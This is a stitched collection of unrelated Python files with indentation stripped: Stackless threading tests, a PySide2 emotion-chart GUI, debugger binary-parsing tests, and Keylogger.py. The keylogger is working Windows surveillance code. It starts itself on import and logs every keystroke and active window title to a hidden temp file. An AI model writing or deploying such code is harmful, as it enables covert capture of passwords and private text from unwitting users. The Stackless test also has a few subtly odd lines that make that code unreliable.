conversion.convert(test_fn, self._simple_program_ctx())
return old_node_to_graph(node, context)
try:
conversion.node_to_graph = node_to_graph_wrapper
new_f = conversion.convert(test_fn, self._simple_program_ctx())
self.assertIsNotNone(new_f)
finally:
conversion.node_to_graph = old_node_to_graph
if __name__ == '__main__':
test.main()
|
test_thread.py
|
from __future__ import absolute_import
# import common
import unittest
import stackless
import sys
import time
import struct
import _teststackless
from _stackless import _test_nostacklesscall as apply_not_stackless
from support import test_main # @UnusedImport
from support import StacklessTestCase, AsTaskletTestCase, testcase_leaks_references
try:
import threading
try:
import thread
except ImportError:
import _thread as thread
withThreads = True
except:
withThreads = False
class threading(object):
Thread = object
class SkipMixin(object):
def skipUnlessSoftswitching(self):
if not stackless.enable_softswitch(None):
self.skipTest("test requires softswitching")
def GetRemoteTasklets(callables):
"""Get a non-scheduled tasklet on a remote thread"""
c = stackless.channel()
def tfunc():
# thread func: create the tasklets, remove them from the scheduler, send them
# to the master, then wait for each tasklet to finish.
try:
c2 = stackless.channel()
tasklets = []
for callable in callables:
def helper(callable):
try:
callable()
except:
c2.send_throw(*sys.exc_info())
else:
c2.send(None)
t = stackless.tasklet(helper)(callable)
t.remove()
tasklets.append(t)
c.send(tasklets)
except:
c.send_throw(*sys.exc_info())
stackless.__reduce__()
for callable in callables:
c2.receive()
stackless.run() # drain the scheduler
thread = threading.Thread(target=tfunc)
thread.start()
d = c.receive(), thread
return d
class LingeringThread(threading.Thread):
""" A thread that lingers on after executing its main function"""
def __init__(self, *args, **kwargs):
self.real_target = kwargs["target"]
kwargs["target"] = self.thread_func
super(LingeringThread, self).__init__(*args, **kwargs)
self.shutdown = threading.Event()
def thread_func(self, *args, **kwargs):
result = self.real_target(*args, **kwargs)
self.linger()
return result
def linger(self):
# wait until join is called
self.shutdown.wait()
def join(self):
self.shutdown.set()
super(LingeringThread, self).join()
time.sleep(0.01) # give the thread a chance to clean up
def __enter__(self):
pass
def __exit__(self, ex, val, tb):
self.join()
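# Hedged note: LingeringThread doubles as a context manager. __enter__ is a
# no-op and __exit__ joins the thread, so the tests below typically do
#     theThread, t = self.create_thread_task()
#     with theThread:
#         ...inspect the remote tasklet while its thread is still alive...
# and the thread is only released (shutdown event set, then joined) when the
# with-block exits.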
class SchedulingThread(LingeringThread):
""" A thread that runs a scheduling loop after executing its main function"""
def linger(self):
while not self.shutdown.is_set():
stackless.run()
time.sleep(0.001)
def GetRemoteTasklet(callable, args):
"""Get a non-scheduled tasklet on a remote thread"""
tasklets, thread = GetRemoteTasklets([lambda:callable(*args)])
return tasklets[0], thread
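# Hedged usage sketch (illustrative only, not used by the tests below):
# GetRemoteTasklet hands back a tasklet that is bound to, but not scheduled on,
# a worker thread, plus the thread object itself. A caller drives the tasklet
# and then joins the thread, roughly like this:
def _example_remote_tasklet_usage(callable_, args=()):
    """Illustrative helper only; the name and flow are assumptions, not test API."""
    task, worker = GetRemoteTasklet(callable_, args)
    try:
        task.run()          # executes on the remote thread's scheduler
    finally:
        worker.join(2)      # always join so the worker thread can shut down
    return task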
@unittest.skipUnless(withThreads, "requires thread support")
class TestRemoteSchedule(AsTaskletTestCase):
def setUp(self):
super(TestRemoteSchedule, self).setUp()
self.events = []
def testFoo(self):
def foo():
pass
t, thread = GetRemoteTasklet(foo, ())
try:
t.run()
finally:
thread.join(2)
def testRun(self):
def foo():
self.events.append(0)
t, thread = GetRemoteTasklet(foo, ())
try:
t.run()
finally:
thread.join(2)
self.assertEqual(self.events, list(range(len(self.events))))
def testInsert(self):
def foo():
self.events.append(0)
t, thread = GetRemoteTasklet(foo, ())
try:
t.insert()
finally:
thread.join(2)
self.assertEqual(self.events, list(range(len(self.events))))
def testRunOrder(self):
def a():
self.events.append(0)
def b():
self.events.append(1)
def c():
self.events.append(2)
(t1, t2, t3), thread = GetRemoteTasklets((a, b, c))
try:
with stackless.atomic():
t2.insert()
t3.insert()
t1.run() # t1 should run first
finally:
thread.join(2)
self.assertEqual(self.events, list(range(3)))
@unittest.skipUnless(withThreads, "requires thread support")
class TestRebindCrash(SkipMixin, StacklessTestCase):
"""A crash from Anselm Kruis, occurring when transferring tasklet to a thread"""
def create_remote_tasklet(self, nontrivial=False, job=None):
result = []
e1 = threading.Event()
e2 = threading.Event()
def remove():
stackless.schedule_remove(retval=None)
def taskletfunc():
result.append(stackless.getcurrent())
if nontrivial:
_teststackless.test_cstate(remove)
else:
remove()
if job:
job()
def threadfunc():
t = stackless.tasklet(taskletfunc)()
t.run()
e1.set()
while not e2.is_set():
stackless.run()
time.sleep(0.001)
e2.wait() # wait until we can die
t = threading.Thread(target=threadfunc)
t.start()
e1.wait()
# callable to end the thread
def end():
e2.set()
t.join()
return end, result[0]
def to_current_thread(self, task):
"""
Get a tasklet for the current thread.
If the tasklet already belongs to the current thread, this
method returns the tasklet unmodified.
Otherwise, this method tries to
unbind the tasklet and returns a newly created tasklet. If
unbinding fails, the method raises :exc:`RuntimeError`.
"""
self.skipUnlessSoftswitching()
if task.thread_id == thread.get_ident():
return task
reducedTask = task.__reduce__()
# raises RuntimeError if the task is alive but not paused
task.bind(None)
if False: # Stackless will crash if set to False
frameList = reducedTask[2][3]
for i in range(len(frameList)):
frame = frameList[i]
if isinstance(frame, stackless.cframe):
reducedFrame = frame.__reduce__()
newFrame = reducedFrame[0](*reducedFrame[1])
newFrame.__setstate__(reducedFrame[2])
frameList[i] = newFrame
# rebind the task
task = reducedTask[0](*reducedTask[1])
for i in range(len(reducedTask[2][3])):
if not isinstance(reducedTask[2][3][i], stackless.cframe):
reducedTask[2][3][i] = reducedTask[2][3][i].frame
task.__setstate__(reducedTask[2])
return task
def test_crash(self):
self.skipUnlessSoftswitching()
end, task = self.create_remote_tasklet()
try:
task = self.to_current_thread(task)
task.run()
finally:
end()
def test_no_rebind(self):
result = []
e = threading.Event()
def job():
result.append(thread.get_ident())
e.set()
end, task = self.create_remote_tasklet(job=job)
try:
task.run()
e.wait()
self.assertNotEqual(result[0], thread.get_ident())
finally:
end()
def test_rebind(self):
self.skipUnlessSoftswitching()
result = []
def job():
result.append(thread.get_ident())
end, task = self.create_remote_tasklet(job=job)
try:
task.bind_thread()
task.run()
self.assertEqual(result[0], thread.get_ident())
finally:
end()
def test_rebind_nontrivial(self):
end, task = self.create_remote_tasklet(nontrivial=True)
try:
self.assertRaisesRegex(RuntimeError, "C state", task.bind_thread)
finally:
end()
@unittest.skipUnless(withThreads, "requires thread support")
class RemoteTaskletTests(SkipMixin, StacklessTestCase):
ThreadClass = LingeringThread
def setUp(self):
super(RemoteTaskletTests, self).setUp()
self.taskletExecuted = False
self.event = threading.Event()
self.channel = stackless.channel()
def create_tasklet(self, action, *args, **kw):
self.tasklet = stackless.tasklet(action)(*args, **kw)
self.event.set()
def tasklet_action(self):
self.taskletExecuted = True
def create_thread_task(self, action=None):
if not action:
action = self.tasklet_action
theThread = self.ThreadClass(target=self.create_tasklet,
args=(action,))
theThread.start()
self.event.wait()
self.event.clear()
t = self.tasklet
return theThread, t
class TestRemove(RemoteTaskletTests):
def test_remove_balance(self):
""" Test that remove from the runqueue of a remote thread does not affect the
bookkeeping of the current thread.
"""
before = stackless.getruncount()
thread, task = self.create_thread_task()
try:
after = stackless.getruncount()
self.assertEqual(before, after)
task.remove()
after = stackless.getruncount()
# only the runnable count on the remote thread
# should change
self.assertEqual(before, after)
finally:
thread.join()
def test_insert_balance(self):
""" Test that insert into the runqueue of a remote thread does not affect the
bookkeeping of the current thread.
"""
thread, task = self.create_thread_task()
try:
task.remove()
before = stackless.getruncount()
task.insert()
after = stackless.getruncount()
# only the runnable count on the remote thread
# should change
self.assertEqual(before, after)
finally:
thread.join()
class DeadThreadTest(RemoteTaskletTests):
def test_tasklet_from_dead_thread(self):
theThread, t = self.create_thread_task()
self.assertTrue(t.alive)
theThread.join()
time.sleep(0.01) # give the thread a short time to clean up
# now the tasklet should have been killed.
self.assertFalse(t.alive)
def test_removed_tasklet_from_dead_thread(self):
theThread, t = self.create_thread_task()
self.assertTrue(t.scheduled)
t.remove()
self.assertFalse(t.scheduled)
theThread.join()
time.sleep(0.01) # give the thread a short time to clean up
# now the tasklet should have been killed.
self.assertFalse(t.alive)
def test_rebound_tasklet_from_dead_thread(self):
theThread, t = self.create_thread_task()
t.remove()
t.bind_thread()
theThread.join()
# now the tasklet should be alive
self.assertTrue(t.alive)
t.run()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
def test_bind_runnable(self):
theThread, t = self.create_thread_task()
self.assertRaisesRegex(RuntimeError, "runnable", t.bind_thread)
theThread.join()
def test_death(self):
"""test tasklets from dead threads"""
theThread, t = self.create_thread_task()
with theThread:
self.assertNotEqual(t.thread_id, -1)
self.assertEqual(t.thread_id, -1)
def test_rebind_from_dead(self):
"""test that rebinding a fresh tasklet from a dead thread works"""
theThread, t = self.create_thread_task()
with theThread:
self.assertNotEqual(t.thread_id, -1)
self.assertEqual(t.thread_id, -1)
t.bind_thread()
self.assertEqual(t.thread_id, stackless.getcurrent().thread_id)
@testcase_leaks_references("test catches TaskletExit and refuses to die in its own thread")
def test_rebind_from_dead_fail_cstate(self):
# A test for https://github.com/stackless-dev/stackless/issues/92
loop = True
def task():
while loop:
try:
stackless.main.switch()
except TaskletExit:
pass
def other_thread_main():
tlet.bind_thread()
tlet.run()
tlet = stackless.tasklet().bind(apply_not_stackless, (task,))
t = threading.Thread(target=other_thread_main, name="other thread")
t.start()
t.join()
time.sleep(0.1) # other_thread needs some time to be destroyed
self.assertEqual(tlet.thread_id, -1)
self.assertFalse(tlet.alive)
self.assertFalse(tlet.restorable)
self.assertGreater(tlet.nesting_level, 0)
loop = False
try:
self.assertRaisesRegex(RuntimeError, "tasklet has C state on its stack", tlet.bind_thread)
except AssertionError:
tlet.kill() # causes an assertion error in debug builds of 2.7.9-slp
raise
# the tasklet has no thread
self.assertEqual(tlet.thread_id, -1)
self.tasklet_is_uncollectable(tlet)
def test_methods_on_dead(self):
"""test that tasklet methods on a dead tasklet behave well"""
class MyException(Exception):
pass
theThread, t = self.create_thread_task()
with theThread:
self.assertNotEqual(t.thread_id, -1)
self.assertEqual(t.thread_id, -1)
self.assertFalse(t.alive)
self.assertFalse(t.paused)
self.assertFalse(t.blocked)
self.assertFalse(t.scheduled)
self.assertTrue(t.restorable)
self.assertFalse(t.atomic)
self.assertFalse(t.block_trap)
self.assertFalse(t.ignore_nesting)
self.assertIsNone(t.next)
self.assertIsNone(t.prev)
# must not raise an exception
t.trace_function
t.profile_function
self.assertEqual(t.thread_id, -1)
t.bind(None)
self.assertEqual(t.thread_id, -1)
t.remove()
self.assertEqual(t.thread_id, -1)
t.bind(lambda: None)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.setup)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.bind, lambda: None, ())
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.insert)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.run)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.switch)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.raise_exception, MyException, 'test')
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.throw, MyException)
self.assertEqual(t.thread_id, -1)
t.__reduce__()
self.assertEqual(t.thread_id, -1)
t.set_atomic(t.set_atomic(True))
self.assertEqual(t.thread_id, -1)
t.set_ignore_nesting(t.set_ignore_nesting(1))
self.assertEqual(t.thread_id, -1)
t.bind(None)
self.assertEqual(t.thread_id, -1)
class BindThreadTest(RemoteTaskletTests):
"""More unittests for tasklet.bind_thread"""
def testForeignThread_scheduled(self):
theThread, t = self.create_thread_task()
try:
self.assertEqual(t.thread_id, theThread.ident)
self.assertTrue(t.alive)
self.assertFalse(t.paused)
t.remove()
self.assertTrue(t.paused)
t.bind_thread()
self.assertTrue(t.alive)
self.assertTrue(t.paused)
self.assertNotEqual(t.thread_id, theThread.ident)
self.assertEqual(t.thread_id, thread.get_ident())
t.insert()
self.assertFalse(t.paused)
stackless.run()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
finally:
theThread.join()
def test_bind_to_current_tid(self):
current_id = stackless.getcurrent().thread_id
self.assertEqual(current_id, thread.get_ident())
theThread, t = self.create_thread_task()
t.remove()
with theThread:
self.assertEqual(t.thread_id, theThread.ident)
t.bind_thread(current_id)
self.assertEqual(t.thread_id, current_id)
t.run()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
def test_bind_to_bogus_tid(self):
current_id = stackless.getcurrent().thread_id
self.assertEqual(current_id, thread.get_ident())
theThread, t = self.create_thread_task()
t.remove()
with theThread:
self.assertEqual(t.thread_id, theThread.ident)
self.assertRaises(OverflowError, t.bind_thread, -2)
# try the max long value, it is very likely not a valid id
self.assertRaises(ValueError, t.bind_thread,
((1 << (struct.calcsize('@L')*8-1))-1))
t.bind_thread(current_id)
self.assertEqual(t.thread_id, current_id)
t.run()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
class SchedulingBindThreadTests(RemoteTaskletTests):
ThreadClass = SchedulingThread
def tasklet_action(self):
self.channel.receive()
self.taskletExecuted = True
self.channel.send(None)
def test_bind_to_other_tid(self):
self.skipUnlessSoftswitching()
current_id = stackless.getcurrent().thread_id
self.assertEqual(current_id, thread.get_ident())
theThread, t = self.create_thread_task()
with theThread:
otherThread, t2 = self.create_thread_task()
with otherThread:
self.assertEqual(t.thread_id, theThread.ident)
t.bind_thread(otherThread.ident)
self.assertEqual(t.thread_id, otherThread.ident)
self.channel.send(None)
self.channel.receive()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
def tasklet_runnable_action(self):
"""A tasklet that keeps itself runnable"""
while not self.channel.balance:
stackless.schedule()
time.sleep(0.001)
self.channel.receive()
def test_rebind_runnable(self):
theThread, t = self.create_thread_task(self.tasklet_runnable_action)
with theThread:
self.assertRaisesRegex(RuntimeError, 'runnable', t.bind_thread)
self.channel.send(None)
class SwitchTest(RemoteTaskletTests):
ThreadClass = SchedulingThread
def tasklet_action(self):
stackless.schedule_remove() # pause it
self.taskletExecuted = True
def test_switch(self):
"""Test that inter-thread switching fails"""
theThread, t = self.create_thread_task()
with theThread:
time.sleep(0.01)
self.assertTrue(t.paused)
self.assertRaisesRegex(RuntimeError, "different thread", t.switch)
class SetupFromDifferentThreadTest(RemoteTaskletTests):
# Test case for issue #60 https://github.com/stackless-dev/stackless/issues/60
def create_tasklet(self, action, *args, **kw):
self.tasklet = stackless.tasklet(action)
self.event.set()
def test_setup_from_other_thread(self):
theThread, t = self.create_thread_task()
t.setup()
theThread.join()
@unittest.skipUnless(withThreads, "requires thread support")
class TestThreadLocalStorage(StacklessTestCase):
class ObjectWithDestructor(object):
def __init__(self, event):
self.event = event
def __del__(self):
self.event.set()
def test_destructor_at_end_of_thread(self):
# Test case for issue #121 https://github.com/stackless-dev/stackless/issues/121
# Run a destructor during clean up of thread local storage
# Until issue #121 got fixed, this caused a reference leak
tls = threading.local()
deleted = threading.Event()
def other_thread():
tls.owd = self.ObjectWithDestructor(deleted)
self.assertFalse(deleted.is_set())
t = threading.Thread(target=other_thread, name="other thread")
t.start()
t.join()
time.sleep(0.1) # give the thread time to clean up
self.assertTrue(deleted.is_set())
if __name__ == '__main__':
if not sys.argv[1:]:
sys.argv.append('-v')
unittest.main()
|
Keylogger.py
|
# Import modules
import os
import win32gui
try:
from threading import Thread
from pynput.keyboard import Key, Listener
except ImportError:
raise SystemExit('Please run: pip install pynput')
# Define variables for keylogger
Count = 0
Keys = []
WindowsTitle = ''
# Callback invoked on every key press
def Keyboard(Key):
global Count, Keys
Keys.append(Key)
Count += 1
if Count >= 1:
WriteFile(Keys)
Keys = []
Count = 0
# Writing pressed buttons to a file
def WriteFile(Key):
with open(os.getenv('Temp') + '\\Keylogs.txt', 'a', encoding='utf-8') as f:
global WindowsTitle
if WindowsTitle != win32gui.GetWindowText(win32gui.GetForegroundWindow()):
f.write(('\n\n' + win32gui.GetWindowText(win32gui.GetForegroundWindow()) + '\n'))
if str(Key).find('space') >= 0:
f.write(' ')
elif str(Key).find('Key') == -1:
Key = str(Key[0]).replace("'", '')
try:
f.write(Key)
except:
pass
WindowsTitle = win32gui.GetWindowText(win32gui.GetForegroundWindow())
# Listener function
def Threader():
while True:
try:
with Listener(on_press=Keyboard) as listener:
listener.join()
except:
pass
# Activates the keylogger thread
Thread(target=Threader).start()
|
run_model_improved.py
|
import sys
import threading
from multiprocessing import Process, Queue
import numpy
import PySide2.QtCharts
from os.path import basename
from PySide2.QtCore import QPoint, Qt, QRect, QTimer
from PySide2.QtWidgets import QAction, QMainWindow, QApplication, QPushButton, QMenu, QFileDialog
from PySide2.QtGui import QPixmap, QImage, QPainter, QPen
from PySide2.QtCharts import QtCharts
import pyside2_faceReader_draw_image
from pyside2_faceReader_box_movable import Grabber
from pyside2_faceReader_model import FaceReader
from random import random
## Move to different file?
def model_worker(inputs_queue, outputs_queue,x,y,w,h):
while True:
if not inputs_queue.empty():
print(f'Receiving message')
message = inputs_queue.get()
print(f'message:', message)
if message == 'STOP':
print(f'stopping')
break
elif message == "start":
model = FaceReader(outputs_queue)
count = 0
x1 = x
y1 = y
width = w
height = h
while True:
# Use multiple queues: the input message queue is drained before the model starts,
# so box-location changes made before the start button are not reprocessed here.
if not inputs_queue.empty():
message = inputs_queue.get()
print(f'message:', message)
if "UPDATE" in message:
new_cords = message.split(" ")
x1 = int(new_cords[1])
y1 = int(new_cords[2])
width = x1+int(new_cords[3])
height = y1+int(new_cords[4])
elif message == 'STOP':
print(f'stopping')
break
else:
continue
else:
# take image here, then input that into the functions
model.run(x1, y1, width, height, count)
count += 1
if count > 200:
count = 0
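# Hedged summary of the queue protocol assumed by model_worker (inferred from the
# code above, not a documented API):
#   "start"                  -> construct FaceReader and enter the capture loop
#   "UPDATE <x> <y> <w> <h>" -> move/resize the capture box while running
#   "STOP"                   -> leave the loop (honoured before or after "start")
# Per-frame confidence arrays are pushed onto outputs_queue by the model.
def _format_update_message(x, y, w, h):
    """Illustrative helper only (hypothetical, not used elsewhere in this file)."""
    return "UPDATE %d %d %d %d" % (x, y, w, h)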
class Menu(QMainWindow):
default_title = "ReLuu FaceReader"
face_box = None
face_reader = None
def __init__(self, numpy_image=None, start_position=(200, 300, 550, 500)):
super().__init__()
self.box_x = None
self.box_y = None
self.box_w = None
self.box_h = None
self.model_running = False
self.box_drawn_can_start = False
self.face_anger_digust = 0
self.face_happy = 0
self.face_neutral = 0
self.face_sadness = 0
self.face_surprise_fear = 0
self.face_lock = threading.Lock()
self.face_confidence_level = numpy.zeros((1,5))
self.face_confidence_entry_count = 0
self.emotion_set = None
self.create_graph()
self._timer = QTimer()
self._timer.setInterval(33)
self._timer.timeout.connect(self.calculate_emotion)
self._timer.start()
self._graph_timer = None
self.face_model_process = None
self.inputs_queue = Queue()
self.outputs_queue = Queue()
#Seems clunky, idk
self.update_position_queue = Queue(1)
self.update_position_lock = threading.Lock()
self._graph_timer = QTimer()
self._graph_timer.setInterval(2000)
self._graph_timer.timeout.connect(self.create_graph)
# self.delete_timer = QTimer()
# self.delete_timer.setInterval(1500)
# self.delete_timer.timeout.connect(self.print_cords_forme)
# self.delete_timer.start()
# self.delete_timer2 = QTimer()
# self.delete_timer2.setInterval(33)
# self.delete_timer2.timeout.connect(self.update_position_model_not_running)
# self.delete_timer2.start()
# New snip
new_snip_action = QAction("Draw Box", self)
new_snip_action.triggered.connect(self.__new_image_window)
close_box = QAction('Close Box', self)
close_box.triggered.connect(self.__close_box)
run_program = QAction('start program', self)
run_program.triggered.connect(self.__start_program)
stop_program = QAction('stop program', self)
stop_program.triggered.connect(self.__stop_program)
self.toolbar = self.addToolBar('Exit')
self.toolbar.addAction(new_snip_action)
self.toolbar.addAction(close_box)
self.toolbar.addAction(run_program)
self.toolbar.addAction(stop_program)
self.snippingTool = pyside2_faceReader_draw_image.SnippingWidget(self)
self.setGeometry(*start_position)
self.show()
def create_graph(self):
self.face_lock.acquire()
self.emotion_set = QtCharts.QBarSet('Confidence Level')
# guard against 0/0 (an all-NaN graph) before any model output has arrived
new_graph_value = self.face_confidence_level / max(self.face_confidence_entry_count, 1)
print(f"----- New graph value: {new_graph_value} --------------")
self.face_anger_digust = new_graph_value[0][0]
self.face_happy = new_graph_value[0][1]
self.face_neutral = new_graph_value[0][2]
self.face_sadness = new_graph_value[0][3]
self.face_surprise_fear = new_graph_value[0][4]
self.emotion_set.append([self.face_anger_digust, self.face_happy, self.face_neutral, self.face_sadness, self.face_surprise_fear])
series = QtCharts.QHorizontalBarSeries()
series.append(self.emotion_set)
self.face_confidence_level = numpy.zeros((1,5))
self.face_confidence_entry_count = 0
self.face_lock.release()
chart = QtCharts.QChart()
chart.addSeries(series)
chart.setTitle('ReLuu FaceReader')
# chart.setAnimationOptions(QtCharts.SeriesAnimations)
emotions = ('Angry and Disgusted', 'Happy', 'Neutral', 'Sadness', 'Fear and Surprise')
axisY = QtCharts.QBarCategoryAxis()
axisY.append(emotions)
chart.addAxis(axisY, Qt.AlignLeft)
series.attachAxis(axisY)
axisX = QtCharts.QValueAxis()
axisX.setMax(1.0)
chart.addAxis(axisX, Qt.AlignBottom)
series.attachAxis(axisX)
axisX.applyNiceNumbers()
chart.legend().setVisible(True)
chart.legend().setAlignment(Qt.AlignBottom)
chartView = QtCharts.QChartView(chart)
chartView.setRenderHint(QPainter.Antialiasing)
self.setCentralWidget(chartView)
def __new_image_window(self):
self.snippingTool.start()
def __create_box(self, x,y,w,h):
width = w-x
height = h-y
Menu.face_box = Grabber(x,y,width,height, self.inputs_queue, self.update_position_queue, self.update_position_lock)
self.box_x = x
self.box_y = y
self.box_w = w
self.box_h = h
self.box_drawn_can_start = True
def __start_program(self):
if self.box_drawn_can_start and not self.model_running:
self.update_position_lock.acquire()
self._graph_timer.start()
# if not self.update_position_queue.empty():
# message = self.update_position_queue.get()
# new_cords = message.split(" ")
# self.box_x = int(new_cords[1])
# self.box_y = int(new_cords[2])
# self.box_w = self.box_x+int(new_cords[3])
# self.box_h = self.box_y+int(new_cords[4])
# self.update_position_queue.put(message)
self.face_model_process = Process(target=model_worker, args=(self.inputs_queue, self.outputs_queue, self.box_x, self.box_y, self.box_w, self.box_h))
self.face_model_process.start()
self.model_running = True
self.inputs_queue.put("start")
self.update_position_lock.release()
elif not self.box_drawn_can_start:
print("---Cannot start program, box not drawn---")
else:
print("---model running___")
# Only used when the model is not running
# def update_position_model_not_running(self):
# if not global_model_start:
# if not self.inputs_queue.empty():
# message = self.inputs_queue.get()
# print(f'message:', message)
# if "UPDATE" in message:
# new_cords = message.split(" ")
# self.box_x = int(new_cords[1])
# self.box_y = int(new_cords[2])
# self.box_w = self.box_x+int(new_cords[3])
# self.box_h = self.box_y+int(new_cords[4])
# def print_cords_forme(self):
# if not global_model_start:
# print("printing cords")
# print(self.box_x, self.box_y, self.box_w, self.box_h)
def calculate_emotion(self):
if not self.outputs_queue.empty():
self.face_lock.acquire()
self.face_confidence_entry_count +=1
face_confidence_output = self.outputs_queue.get()
self.face_confidence_level += face_confidence_output
print("-------emotion calculated-------")
self.face_lock.release()
def __stop_program(self):
if self.face_model_process is not None:
self.face_model_process.terminate()
self._graph_timer.stop()
self.model_running = False
print("---closing model---")
def __close_box(self):
if Menu.face_box:
self.__stop_program()
Menu.face_box.close_window()
self.box_drawn_can_start = False
print("---closing box---")
def __graph(self):
self.face_lock.acquire()
print("updating graph...")
r1 = random()
r2 = random()
r3 = random()
r4 = random()
r5 = random()
self.face_anger_digust = r1
self.face_happy = r2
self.face_neutral = r3
self.face_sadness = r4
self.face_surprise_fear = r5
self.emotion_set.append([self.face_anger_digust, self.face_happy, self.face_neutral, self.face_sadness, self.face_surprise_fear])
# self.face_confidence_level = numpy.zeros((1,5))
# self.face_confidence_entry_count = 0
# new_graph_value = self.face_confidence_level / self.face_confidence_entry_count
# print(str(new_graph_value))
# self.face_anger_digust = new_graph_value[0][0]
# self.face_happy = new_graph_value[0][1]
# self.face_neutral = new_graph_value[0][2]
# self.face_sadness = new_graph_value[0][3]
# self.face_surprise_fear = new_graph_value[0][4]
# self.emotion_set.append([self.face_anger_digust, self.face_happy, self.face_neutral, self.face_sadness, self.face_surprise_fear])
# self.face_confidence_level = numpy.zeros((1,5))
# self.face_confidence_entry_count = 0
self.face_lock.release()
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.drawing = True
self.lastPoint = event.pos() - QPoint(0, self.toolbar.height())
def mouseMoveEvent(self, event):
# buttons() is a bit mask, so the left button must be tested with a bitwise &
if (event.buttons() & Qt.LeftButton) and self.drawing:
painter = QPainter(self.image)
painter.setPen(QPen(self.brushColor, self.brushSize, Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin))
painter.drawLine(self.lastPoint, event.pos() - QPoint(0, self.toolbar.height()))
self.lastPoint = event.pos() - QPoint(0, self.toolbar.height())
self.update()
def mouseReleaseEvent(self, event):
if event.button() == Qt.LeftButton:
self.drawing = False
def closeEvent(self, event):
if Menu.face_box: Menu.face_box.close()
event.accept()
if __name__ == '__main__':
app = QApplication(sys.argv)
mainMenu = Menu()
sys.exit(app.exec_())
|
test.py
|
#!/usr/bin/env python3
#
# unit tests for debugger
import os
import re
import sys
import time
import platform
import threading
import traceback
import subprocess
from struct import unpack
import colorama
sys.path.append('..')
import debugger.lldb as lldb
import debugger.dbgeng as dbgeng
import debugger.DebugAdapter as DebugAdapter
import debugger.gdb as gdb
import debugger.utils as utils
# globals
adapter = None
testbin = None
#--------------------------------------------------------------------------
# UTILITIES
#--------------------------------------------------------------------------
def shellout(cmd):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
stdout = stdout.decode("utf-8")
stderr = stderr.decode("utf-8")
#print('stdout: -%s-' % stdout)
#print('stderr: -%s-' % stderr)
process.wait()
return (stdout, stderr)
def parse_image(fpath):
load_addr = None
entry_offs = None
print('finding entrypoint for %s' % fpath)
with open(fpath, 'rb') as fp:
data = fp.read()
# little endian macho
if data[0:4] == b'\xCF\xFA\xED\xFE':
assert_equality(data[4:8], b'\x07\x00\x00\x01') # CPU_TYPE_X86_X64
ncmds = unpack('<I', data[16:20])[0]
#print('ncmds: %d' % ncmds)
vmaddr = None
entryoff1 = None # offset given by COMMAND entry_point_command (priority)
entryoff2 = None # offset of __text section inside __TEXT segment
offs = 0x20
for i in range(ncmds):
cmd = unpack('<I', data[offs:offs+4])[0]
cmdsize = unpack('<I', data[offs+4:offs+8])[0]
if cmd == 0x19: # segment_command_64
if data[offs+8:offs+16] == b'\x5F\x5F\x54\x45\x58\x54\x00\x00': # __TEXT
vmaddr = unpack('<Q', data[offs+24:offs+32])[0]
print('vmaddr: %X' % vmaddr)
nsects = unpack('<I', data[offs+64:offs+68])[0]
#print('segment __TEXT nsects: %d' % nsects)
# advance past command to first section
o_scn = offs + 0x48
for i in range(nsects):
name = data[o_scn+0:o_scn+16]
#print('__TEXT section %d: %s' % (i, name))
if name == b'__text\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00':
entryoff2 = unpack('<I', data[o_scn+0x30:o_scn+0x34])[0]
break
o_scn += 0x50
if entryoff2 == None:
raise Exception('couldn\'t locate section __text in segment __TEXT in %s' % fpath)
if cmd == 0x80000028: # entry_point_command
entryoff1 = unpack('<I', data[offs+8:offs+12])[0]
#print('entryoff1: %X' % entryoff1)
offs += cmdsize
if not vmaddr:
raise Exception('couldn\'t locate segment_command_64 (where __TEXT loads) in %s' % fpath)
if entryoff1 == None and entryoff2 == None:
raise Exception('couldn\'t locate entry_point_command in macho (where main is) in %s' % fpath)
load_addr = vmaddr
entry_offs = entryoff1 or entryoff2
# PE
elif data[0:2] == b'\x4d\x5a':
e_lfanew = unpack('<I', data[0x3C:0x40])[0]
if data[e_lfanew:e_lfanew+6] == b'\x50\x45\x00\x00\x64\x86':
# x86_64
entryoff = unpack('<I', data[e_lfanew+0x28:e_lfanew+0x2C])[0]
vmaddr = unpack('<Q', data[e_lfanew+0x30:e_lfanew+0x38])[0]
elif data[e_lfanew:e_lfanew+6] == b'\x50\x45\x00\x00\x4c\x01':
# x86
entryoff = unpack('<I', data[e_lfanew+0x28:e_lfanew+0x2C])[0]
vmaddr = unpack('<I', data[e_lfanew+0x34:e_lfanew+0x38])[0]
load_addr = vmaddr
entry_offs = entryoff
# ELF
elif data[0:4] == b'\x7FELF':
if data[4] == 1: # EI_CLASS 32-bit
assert_equality(data[5], 1) # EI_DATA little endian
assert data[0x10:0x12] in [b'\x02\x00', b'\x03\x00'] # e_type ET_EXEC or ET_DYN (pie)
#assert_equality(data[0x12:0x14], b'\x3E\x00' # e_machine EM_X86_64)
e_entry = unpack('<I', data[0x18:0x1C])[0]
e_phoff = unpack('<I', data[0x1C:0x20])[0]
e_phentsize = unpack('<H', data[0x2A:0x2C])[0]
e_phnum = unpack('<H', data[0x2C:0x2E])[0]
print('e_entry:0x%X e_phoff:0x%X e_phentsize:0x%X e_phnum:0x%X' %
(e_entry, e_phoff, e_phentsize, e_phnum))
# find first PT_LOAD
p_vaddr = None
offs = e_phoff
for i in range(e_phnum):
p_type = unpack('<I', data[offs:offs+4])[0]
#print('at offset 0x%X p_type:0x%X' % (offs, p_type))
if p_type == 1:
p_vaddr = unpack('<I', data[offs+8:offs+12])[0]
break
offs += e_phentsize
if p_vaddr == None:
raise Exception('couldnt locate a single PT_LOAD program header')
load_addr = p_vaddr
entry_offs = e_entry - p_vaddr
elif data[4] == 2: # EI_CLASS 64-bit
assert_equality(data[5], 1) # EI_DATA little endian
